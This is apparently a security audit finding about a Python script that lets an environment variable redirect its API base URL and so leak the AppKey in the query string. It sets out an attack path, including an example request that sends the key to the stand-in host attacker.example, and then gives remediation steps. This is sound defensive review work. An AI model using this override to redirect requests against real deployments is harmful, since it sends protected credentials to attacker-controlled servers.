T09 · Insecure Skill Coding Practices
- Location
scripts/birthday_flower_query.py:23- Finding
AppKey Disclosure Through an Unvalidated API Base URL Override
- Content
View full analysis
Vulnerability Details
File Location:
scripts/birthday_flower_query.py, lines 23 and 125
Vulnerability Type: Credential disclosure through an attacker-controlled outbound request destination
Risk Level: MediumVulnerable Code
python API_BASE_URL = os.environ.get("JIKE_API_BASE_URL", "https://api.jikeapi.cn").rstrip("/")python url = f"{API_BASE_URL}{API_PATH}?{urllib.parse.urlencode({**params, 'appkey': appkey})}"Technical Analysis
The script permits the API origin to be overridden through the undocumented
JIKE_API_BASE_URLenvironment variable. It does not validate the resulting URL's scheme or hostname before appending the AppKey and issuing the request.Because the AppKey is included in the query string, a manipulated base URL causes the credential to be transmitted directly to an arbitrary destination. The override also accepts plain HTTP URLs, which can expose the credential to network interception. Query-string credentials may additionally be retained in web server, reverse proxy, monitoring, and access logs.
Exploitation requires the attacker to influence this environment variable in the execution context. This may be possible through deployment configuration, an automation interface, a wrapper process, or another component that passes attacker-controlled environment settings while independently injecting the protected AppKey.
Attack Path
- The legitimate runtime provides
JIKE_BIRTHDAY_FLOWER_QUERY_KEYorJIKE_APPKEY. - The attacker gains the ability to set or influence
JIKE_API_BASE_URLwithout directly reading the protected AppKey. - The attacker sets it to a server they control, for example
http://attacker.example. - The script constructs a request resembling:
http://attacker.example/v1/birthday/flower?birthday=02-06&appkey=SECRET urllib.request.urlopensends the request to the attacker-controlled server.- The attacker extracts ...[truncated 774 chars]
- The legitimate runtime provides
- Remediation
View remediation
Remediation Suggestions
-
Remove the runtime endpoint override if custom API origins are not required:
python API_BASE_URL = "https://api.jikeapi.cn" -
If an override is necessary for controlled testing, parse and validate it before use:
- Require the
httpsscheme. - Allowlist the exact expected hostname.
- Reject embedded credentials, unexpected ports, fragments, and malformed URLs.
- Keep test endpoint configuration unavailable in production.
- Require the
-
Prefer an authorization header instead of a query-string credential if supported by the API:
python request = urllib.request.Request(url) request.add_header("Authorization", f"Bearer {appkey}") -
Ensure URLs containing credentials are not written to application, proxy, monitoring, or access logs.
-
Restrict who can alter environment variables and deployment configuration for the process.
-
Rotate the AppKey if the script has run with an untrusted or unexpected
JIKE_API_BASE_URL.
-
